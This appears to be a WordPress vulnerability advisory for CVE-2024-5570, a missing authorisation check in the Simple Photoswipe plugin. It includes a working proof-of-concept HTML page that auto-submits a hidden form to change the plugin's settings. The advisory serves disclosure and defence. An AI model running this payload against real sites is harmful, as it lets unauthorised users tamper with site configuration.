Simple Photoswipe <= 0.1 – Subscriber+ Arbitrary Settings Update | CVE 2024-5570

Description

The plugin does not have authorisation check when updating its settings, which could allow any authenticated users, such as subscriber to update them

Proof of Concept

<html>
  <body>
    <form action="http://WP/wp-admin/options-general.php" method="POST">
      <input type="hidden" name="bar&#95;size" value="anything" />
      <input type="hidden" name="indexIndicatorSep" value="anything" />
      <input type="hidden" name="loop&#95;images" value="1" />
      <input type="hidden" name="show&#95;close&#95;element" value="1" />
      <input type="hidden" name="show&#95;fullscreen&#95;element" value="1" />
      <input type="hidden" name="show&#95;zoom&#95;element" value="1" />
      <input type="hidden" name="show&#95;share&#95;element" value="1" />
      <input type="hidden" name="show&#95;counter&#95;element" value="1" />
      <input type="hidden" name="show&#95;arrow&#95;element" value="1" />
      <input type="hidden" name="show&#95;preloader&#95;element" value="1" />
      <input type="hidden" name="tap&#95;to&#95;toggle&#95;controls" value="1" />
      <input type="hidden" name="photoswipe&#95;save" value="Save&#32;Settings" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


the response of the request above is 403, but the settings update still happens